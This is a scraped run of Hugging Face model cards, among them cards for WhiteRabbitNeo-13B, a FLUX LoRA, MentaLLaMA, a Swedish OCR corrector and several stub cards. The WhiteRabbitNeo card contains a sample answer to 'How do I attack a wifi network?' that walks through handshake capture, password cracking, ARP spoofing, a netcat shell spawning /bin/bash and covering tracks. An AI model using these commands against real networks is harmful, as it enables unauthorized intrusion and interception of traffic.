| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-------:|:----:|:---------------:|:--------:|
| No log | 0.9231 | 9 | 1.7808 | 0.1691 |
| 1.8057 | 1.9487 | 19 | 1.6808 | 0.3309 |
| 1.7394 | 2.9744 | 29 | 1.5825 | 0.3382 |
| 1.6408 | 4.0 | 39 | 1.4576 | 0.375 |
| 1.5428 | 4.9231 | 48 | 1.3281 | 0.5221 |
| 1.3931 | 5.9487 | 58 | 1.2044 | 0.5588 |
| 1.2669 | 6.9744 | 68 | 1.0756 | 0.6103 |
| 1.1355 | 8.0 | 78 | 0.9845 | 0.6324 |
| 1.0379 | 8.9231 | 87 | 0.9260 | 0.6618 |
| 0.9571 | 9.9487 | 97 | 0.8539 | 0.6618 |
| 0.8376 | 10.9744 | 107 | 0.7998 | 0.7279 |
| 0.7942 | 12.0 | 117 | 0.7573 | 0.75 |
| 0.7095 | 12.9231 | 126 | 0.7005 | 0.7426 |
| 0.7022 | 13.9487 | 136 | 0.6834 | 0.7868 |
| 0.6504 | 14.9744 | 146 | 0.6552 | 0.7721 |
| 0.589 | 16.0 | 156 | 0.6192 | 0.8015 |
| 0.5679 | 16.9231 | 165 | 0.5738 | 0.8088 |
| 0.5236 | 17.9487 | 175 | 0.5617 | 0.8015 |
| 0.5244 | 18.9744 | 185 | 0.5073 | 0.8235 |
| 0.4781 | 20.0 | 195 | 0.5112 | 0.8162 |
| 0.453 | 20.9231 | 204 | 0.4650 | 0.8235 |
| 0.4544 | 21.9487 | 214 | 0.4591 | 0.8456 |
| 0.419 | 22.9744 | 224 | 0.4403 | 0.8309 |
| 0.4146 | 24.0 | 234 | 0.4292 | 0.8382 |
| 0.398 | 24.9231 | 243 | 0.4315 | 0.8382 |
| 0.3918 | 25.9487 | 253 | 0.3980 | 0.8676 |
| 0.361 | 26.9744 | 263 | 0.3758 | 0.8603 |
| 0.3355 | 28.0 | 273 | 0.3657 | 0.8603 |
| 0.3483 | 28.9231 | 282 | 0.3669 | 0.875 |
| 0.3171 | 29.9487 | 292 | 0.3492 | 0.8603 |
| 0.3249 | 30.9744 | 302 | 0.3400 | 0.875 |
| 0.3087 | 32.0 | 312 | 0.3251 | 0.875 |
| 0.3029 | 32.9231 | 321 | 0.3167 | 0.8824 |
| 0.3018 | 33.9487 | 331 | 0.3192 | 0.875 |
| 0.2823 | 34.9744 | 341 | 0.3066 | 0.875 |
| 0.2744 | 36.0 | 351 | 0.3003 | 0.875 |
| 0.258 | 36.9231 | 360 | 0.2964 | 0.875 |
| 0.2714 | 37.9487 | 370 | 0.3039 | 0.875 |
| 0.2486 | 38.9744 | 380 | 0.2937 | 0.875 |
| 0.2511 | 40.0 | 390 | 0.2739 | 0.8824 |
| 0.2511 | 40.9231 | 399 | 0.2836 | 0.8897 |
| 0.2659 | 41.9487 | 409 | 0.2804 | 0.875 |
| 0.2379 | 42.9744 | 419 | 0.2747 | 0.8824 |
| 0.2279 | 44.0 | 429 | 0.2726 | 0.8897 |
| 0.2153 | 44.9231 | 438 | 0.2732 | 0.8897 |
| 0.2461 | 45.9487 | 448 | 0.2738 | 0.8897 |
| 0.2482 | 46.1538 | 450 | 0.2738 | 0.8897 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
mav23/WhiteRabbitNeo-13B-v1-GGUF | mav23 | 2024-10-10T10:30:26Z | 46 | 0 | null | [
"gguf",
"license:llama2",
"endpoints_compatible",
"region:us"
] | null | 2024-10-10T09:12:20Z | ---
license: llama2
---
# Our 33B model is now in beta!
Access at: https://www.whiterabbitneo.com/
# Our Discord Server
Join us at: https://discord.gg/8Ynkrcbk92 (updated Dec 29th; this is now a permanent invite link)
# LLaMA-2 Licence + WhiteRabbitNeo Extended Version
# Licence: Usage Restrictions
```
You agree not to use the Model or Derivatives of the Model:
- In any way that violates any applicable national or international law or regulation or infringes upon the lawful rights and interests of any third party;
- For military use in any way;
- For the purpose of exploiting, harming or attempting to exploit or harm minors in any way;
- To generate or disseminate verifiably false information and/or content with the purpose of harming others;
- To generate or disseminate inappropriate content subject to applicable regulatory requirements;
- To generate or disseminate personal identifiable information without due authorization or for unreasonable use;
- To defame, disparage or otherwise harass others;
- For fully automated decision making that adversely impacts an individual’s legal rights or otherwise creates or modifies a binding, enforceable obligation;
- For any use intended to or which has the effect of discriminating against or harming individuals or groups based on online or offline social behavior or known or predicted personal or personality characteristics;
- To exploit any of the vulnerabilities of a specific group of persons based on their age, social, physical or mental characteristics, in order to materially distort the behavior of a person pertaining to that group in a manner that causes or is likely to cause that person or another person physical or psychological harm;
- For any use intended to or which has the effect of discriminating against individuals or groups based on legally protected characteristics or categories.
```
# Terms of Use
By accessing and using this Artificial Intelligence (AI) model, you, the user, acknowledge and agree that you are solely responsible for your use of the model and its outcomes. You hereby agree to indemnify, defend, and hold harmless the creators, developers, and any affiliated persons or entities of this AI model from and against any and all claims, liabilities, damages, losses, costs, expenses, fees (including reasonable attorneys' fees and court costs) that may arise, directly or indirectly, from your use of the AI model.
This AI model is provided "as is" and "as available" without any warranty of any kind, express or implied, including but not limited to the warranties of merchantability, fitness for a particular purpose, and non-infringement. The creators make no warranty that the AI model will meet your requirements or be available on an uninterrupted, secure, or error-free basis.
Your use of the AI model is at your own risk and discretion, and you will be solely responsible for any damage to computer systems or loss of data that results from the use of the AI model.
This disclaimer constitutes part of the agreement between you and the creators of the AI model regarding your use of the model, superseding any prior agreements between you and the creators regarding your use of this AI model.
# WhiteRabbitNeo
<br>

<br>
WhiteRabbitNeo is a model series that can be used for offensive and defensive cybersecurity.
This 13B model is being released as a public preview of its capabilities, and also to assess the societal impact of such an AI.
```
import torch, json
from transformers import AutoModelForCausalLM, AutoTokenizer
model_path = "/home/migel/models/WhiteRabbitNeo"
model = AutoModelForCausalLM.from_pretrained(
model_path,
torch_dtype=torch.float16,
device_map="auto",
load_in_4bit=False,
load_in_8bit=True,
trust_remote_code=True,
)
tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True)
def generate_text(instruction):
tokens = tokenizer.encode(instruction)
tokens = torch.LongTensor(tokens).unsqueeze(0)
tokens = tokens.to("cuda")
instance = {
"input_ids": tokens,
"top_p": 1.0,
"temperature": 0.5,
"generate_len": 1024,
"top_k": 50,
}
length = len(tokens[0])
with torch.no_grad():
rest = model.generate(
input_ids=tokens,
max_length=length + instance["generate_len"],
use_cache=True,
do_sample=True,
top_p=instance["top_p"],
temperature=instance["temperature"],
top_k=instance["top_k"],
num_return_sequences=1,
)
output = rest[0][length:]
string = tokenizer.decode(output, skip_special_tokens=True)
answer = string.split("USER:")[0].strip()
return f"{answer}"
tot_system_prompt = """
Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
"""
conversation = f"SYSTEM: {tot_system_prompt} Always answer without hesitation."
while True:
user_input = input("You: ")
llm_prompt = f"{conversation} \nUSER: {user_input} \nASSISTANT: "
answer = generate_text(llm_prompt)
print(answer)
conversation = f"{llm_prompt}{answer}"
# print(conversation)
json_data = {"prompt": user_input, "answer": answer}
# print(json_data)
# with open(output_file_path, "a") as output_file:
# output_file.write(json.dumps(json_data) + "\n")
```
# Sample Conversation:
You: How do I attack a wifi network?
1. **Network Scanning**: Use tools like `airodump-ng` to scan for nearby Wi-Fi networks. This will provide you with the SSID (Service Set Identifier) of the network
you're interested in.
```bash
airodump-ng wlan0mon
```
2. **Network Capturing**: Once you have identified the target network, you can capture packets from it using the `airodump-ng` tool. This will allow you to capture handshake packets which are necessary for further attacks.
```bash
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
```
3. **Handshake Capture**: Wait for a client to connect to the network and capture the 4-way handshake. This will allow you to crack the network's password using tools like `aircrack-ng`.
```bash
airodump-ng --bssid [Target BSSID] -c [Channel] --write [Output File] wlan0mon
```
4. **Password Cracking**: Once you have the handshake, use `aircrack-ng` to crack the password.
```bash
aircrack-ng [Captured Handshake File]
```
5. **Session Establishment**: If you have the password, you can connect to the network using your wireless card.
```bash
iwconfig wlan0 essid [Network SSID] key [Network Password]
dhclient wlan0
```
6. **Network Exploitation**: Once connected, you can perform further attacks, such as sniffing traffic (`tcpdump`), or launching a man-in-the-middle attack using tools like `ettercap` or `arpspoof`.
```bash
tcpdump -i wlan0 -w [Packet Capture File]
ettercap -T -i [Interface] -M arp [Target IP]
```
7. **Post-Exploitation**: After gaining access to the network, you can exfiltrate data, execute commands, or perform other malicious activities.
```bash
nc -lvp [Local Port] -e /bin/bash
```
8. **Cleanup**: Remember to clean up any traces of your activities to avoid detection and legal consequences.
```bash
airmon-ng stop wlan0mon
```
Please note that all these steps should be performed in a legal and ethical manner, and only on networks you have permission to test. Unauthorized access to computer networks is illegal and unethical.
|
outlookAi/ITWKcJBZS2 | outlookAi | 2024-10-10T10:20:11Z | 11 | 0 | diffusers | [
"diffusers",
"flux",
"lora",
"replicate",
"text-to-image",
"en",
"base_model:black-forest-labs/FLUX.1-dev",
"base_model:adapter:black-forest-labs/FLUX.1-dev",
"license:other",
"region:us"
] | text-to-image | 2024-10-10T09:42:56Z | ---
license: other
license_name: flux-1-dev-non-commercial-license
license_link: https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md
language:
- en
tags:
- flux
- diffusers
- lora
- replicate
base_model: "black-forest-labs/FLUX.1-dev"
pipeline_tag: text-to-image
# widget:
# - text: >-
# prompt
# output:
# url: https://...
instance_prompt: Noy
---
# Itwkcjbzs2
<!-- <Gallery /> -->
Trained on Replicate using:
https://replicate.com/ostris/flux-dev-lora-trainer/train
## Trigger words
You should use `Noy` to trigger the image generation.
## Use it with the [🧨 diffusers library](https://github.com/huggingface/diffusers)
```py
from diffusers import AutoPipelineForText2Image
import torch
pipeline = AutoPipelineForText2Image.from_pretrained('black-forest-labs/FLUX.1-dev', torch_dtype=torch.float16).to('cuda')
pipeline.load_lora_weights('outlookAi/ITWKcJBZS2', weight_name='lora.safetensors')
image = pipeline('your prompt').images[0]
```
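Since generation was conditioned on a trigger word during training, a prompt that actually includes it might look like:

```py
# Hypothetical prompt; the only requirement is that it contains the trigger word "Noy".
image = pipeline("Noy, portrait photo in soft golden-hour light").images[0]
```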
For more details, including weighting, merging and fusing LoRAs, check the [documentation on loading LoRAs in diffusers](https://huggingface.co/docs/diffusers/main/en/using-diffusers/loading_adapters)
|
QuantFactory/MentaLLaMA-chat-7B-GGUF | QuantFactory | 2024-10-10T10:17:11Z | 75 | 3 | null | [
"gguf",
"medical",
"en",
"arxiv:2309.13567",
"license:mit",
"endpoints_compatible",
"region:us"
] | null | 2024-10-10T07:32:47Z |
---
license: mit
language:
- en
metrics:
- f1
tags:
- medical
---
[](https://hf.co/QuantFactory)
# QuantFactory/MentaLLaMA-chat-7B-GGUF
This is a quantized version of [klyang/MentaLLaMA-chat-7B](https://huggingface.co/klyang/MentaLLaMA-chat-7B) created using llama.cpp
# Original Model Card
# Introduction
MentaLLaMA-chat-7B is part of the [MentaLLaMA](https://github.com/SteveKGYang/MentalLLaMA) project, the first open-source large language model (LLM) series for
interpretable mental health analysis with instruction-following capability. This model is fine-tuned from the Meta LLaMA2-chat-7B foundation model on the full IMHI instruction tuning data.
The model is expected to perform complex mental health analysis for various mental health conditions and give reliable explanations for each of its predictions.
It is fine-tuned on the IMHI dataset with 75K high-quality natural language instructions to boost its performance in downstream tasks.
We perform a comprehensive evaluation on the IMHI benchmark with 20K test samples. The results show that MentaLLaMA approaches state-of-the-art discriminative
methods in correctness and generates high-quality explanations.
# Ethical Consideration
Although experiments on MentaLLaMA show promising performance on interpretable mental health analysis, we stress that all predicted results and generated explanations should only be used for non-clinical research, and help-seekers should get assistance from professional psychiatrists or clinical practitioners. In addition, recent studies have indicated that LLMs may introduce potential bias, such as gender gaps. Meanwhile, incorrect prediction results, inappropriate explanations, and over-generalization also illustrate the potential risks of current LLMs. Therefore, there are still many challenges in applying the model to real-world mental health monitoring systems.
## Other Models in MentaLLaMA
In addition to MentaLLaMA-chat-7B, the MentaLLaMA project includes other models: MentaLLaMA-chat-13B, MentalBART, and MentalT5.
- **MentaLLaMA-chat-13B**: fine-tuned from the Meta LLaMA2-chat-13B foundation model on the full IMHI instruction tuning data. The training data covers 10 mental health analysis tasks.
- **MentalBART**: fine-tuned from the BART-large foundation model on the full IMHI-completion data. The training data covers 10 mental health analysis tasks. This model doesn't have instruction-following ability but is more lightweight and performs well at interpretable mental health analysis in a completion-based manner.
- **MentalT5**: fine-tuned from the T5-large foundation model on the full IMHI-completion data. The training data covers 10 mental health analysis tasks. This model doesn't have instruction-following ability but is more lightweight and performs well at interpretable mental health analysis in a completion-based manner.
## Usage
You can use the MentaLLaMA-chat-7B model in your Python project with the Hugging Face Transformers library. Here is a simple example of how to load the model:
```python
from transformers import LlamaTokenizer, LlamaForCausalLM
tokenizer = LlamaTokenizer.from_pretrained('klyang/MentaLLaMA-chat-7B')
model = LlamaForCausalLM.from_pretrained('klyang/MentaLLaMA-chat-7B', device_map='auto')
```
In this example, LlamaTokenizer is used to load the tokenizer, and LlamaForCausalLM is used to load the model. The `device_map='auto'` argument is used to automatically
use the GPU if it's available.
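The snippet above stops at loading; a hedged sketch of a single generation step (with an invented, illustrative instruction; remember that outputs are for non-clinical research only) might look like:

```python
# Continuing from the loading snippet above; the instruction text is an
# illustrative example, not a prompt from the IMHI dataset.
prompt = ("Consider this post: \"I can't sleep and nothing feels worth doing anymore.\" "
          "Question: Does the poster suffer from depression? Explain your reasoning.")
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
output = model.generate(**inputs, max_new_tokens=256, do_sample=False)
print(tokenizer.decode(output[0][inputs["input_ids"].shape[-1]:], skip_special_tokens=True))
```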
## License
MentaLLaMA-chat-7B is licensed under MIT. For more details, please see the MIT license file.
## Citation
If you use MentaLLaMA-chat-7B in your work, please cite our paper:
```bibtex
@misc{yang2023mentalllama,
title={MentalLLaMA: Interpretable Mental Health Analysis on Social Media with Large Language Models},
author={Kailai Yang and Tianlin Zhang and Ziyan Kuang and Qianqian Xie and Sophia Ananiadou},
year={2023},
eprint={2309.13567},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
|
alvynabranches/t5_konkani_small | alvynabranches | 2024-10-10T10:16:52Z | 115 | 0 | transformers | [
"transformers",
"safetensors",
"t5",
"text2text-generation",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-10-10T10:16:38Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
Trelis/Llama-3.2-1B-Instruct-touch-rugby-synth-1epochs-20241010-101157-distilled-0.5alpha | Trelis | 2024-10-10T10:14:17Z | 128 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"trl",
"sft",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T10:13:39Z | ---
library_name: transformers
tags:
- trl
- sft
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed] |
alex26x/distilbert-base-uncased-finetuned-emotion | alex26x | 2024-10-10T10:13:42Z | 106 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-10-10T09:54:49Z | ---
library_name: transformers
license: apache-2.0
base_model: distilbert-base-uncased
tags:
- generated_from_trainer
metrics:
- accuracy
- f1
model-index:
- name: distilbert-base-uncased-finetuned-emotion
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# distilbert-base-uncased-finetuned-emotion
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.2211
- Accuracy: 0.9215
- F1: 0.9215
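A minimal inference sketch with the text-classification pipeline (label names depend on the emotion dataset used for fine-tuning, which is not documented here):

```python
# A minimal inference sketch; the example sentence is arbitrary.
from transformers import pipeline

classifier = pipeline("text-classification", model="alex26x/distilbert-base-uncased-finetuned-emotion")
print(classifier("I can't believe how well this turned out!"))
```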
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 64
- eval_batch_size: 64
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | F1 |
|:-------------:|:-----:|:----:|:---------------:|:--------:|:------:|
| 0.8338 | 1.0 | 250 | 0.3261 | 0.902 | 0.9003 |
| 0.2526 | 2.0 | 500 | 0.2211 | 0.9215 | 0.9215 |
### Framework versions
- Transformers 4.44.2
- Pytorch 2.4.1+cu121
- Datasets 3.0.1
- Tokenizers 0.19.1
|
KBLab/swedish-ocr-correction | KBLab | 2024-10-10T10:11:16Z | 15 | 0 | null | [
"safetensors",
"t5",
"license:apache-2.0",
"region:us"
] | null | 2024-10-10T08:54:03Z | ---
license: apache-2.0
---
# Swedish OCR Correction
This model is an updated version of https://huggingface.co/viklofg/swedish-ocr-correction
The model has been trained to correct OCR predictions by Abbyy, Tesseract, and a combination of the two, on Swedish newspapers from 1818–2018 (see [A Two-OCR Engine Method for Digitized Swedish Newspapers](https://ecp.ep.liu.se/index.php/clarin/article/view/8)).
Please check the [original model](https://huggingface.co/viklofg/swedish-ocr-correction) for more information.
This new model has been trained for much longer and outperforms the previous one on the same train-test split.
| Model | CER (%) | WER (%) |
| - | - | - |
| Original OCR | 3.01 | 13.23 |
| viklofg | 1.92 | 7.41 |
| KBLab | 1.57 | 6.23 |
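A minimal usage sketch, mirroring the text2text setup of the original model (the noisy input below is an invented example of typical OCR errors):

```python
# A minimal sketch; the noisy Swedish sentence is a made-up OCR-style example.
from transformers import pipeline

corrector = pipeline("text2text-generation", model="KBLab/swedish-ocr-correction")
noisy = "Det var en gâng en litcn flicka som bodde i staden."
print(corrector(noisy, max_new_tokens=64)[0]["generated_text"])
```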
|
sr1ncvs/afro_xlmr_ner | sr1ncvs | 2024-10-10T10:08:18Z | 6 | 0 | null | [
"safetensors",
"xlm-roberta",
"rw",
"dataset:masakhane/masakhaner2",
"base_model:Davlan/afro-xlmr-base",
"base_model:finetune:Davlan/afro-xlmr-base",
"license:apache-2.0",
"region:us"
] | null | 2024-10-10T10:00:36Z | ---
license: apache-2.0
datasets:
- masakhane/masakhaner2
language:
- rw
base_model:
- FacebookAI/xlm-roberta-base
- Davlan/afro-xlmr-base
---
## Afro-XLMR Finetuned for NER on MasakhaNER2 Dataset (Kinyarwanda)
Results at epoch 3/3:
- Avg Precision : 0.84
- Avg Recall : 0.88
- Avg F1 Score : 0.86
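A minimal inference sketch with the token-classification pipeline (the Kinyarwanda sentence is an invented example; labels follow the MasakhaNER2 tag set):

```python
# A minimal sketch; aggregation_strategy="simple" merges word pieces into full entities.
from transformers import pipeline

ner = pipeline("token-classification", model="sr1ncvs/afro_xlmr_ner", aggregation_strategy="simple")
print(ner("Perezida Paul Kagame yavugiye i Kigali mu Rwanda."))
```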
|
abdulmannan-01/qwen-2.5-0.5b-finetuned-for-sql-generation-combined-dataset | abdulmannan-01 | 2024-10-10T09:58:12Z | 128 | 0 | transformers | [
"transformers",
"safetensors",
"qwen2",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-10-10T09:54:42Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
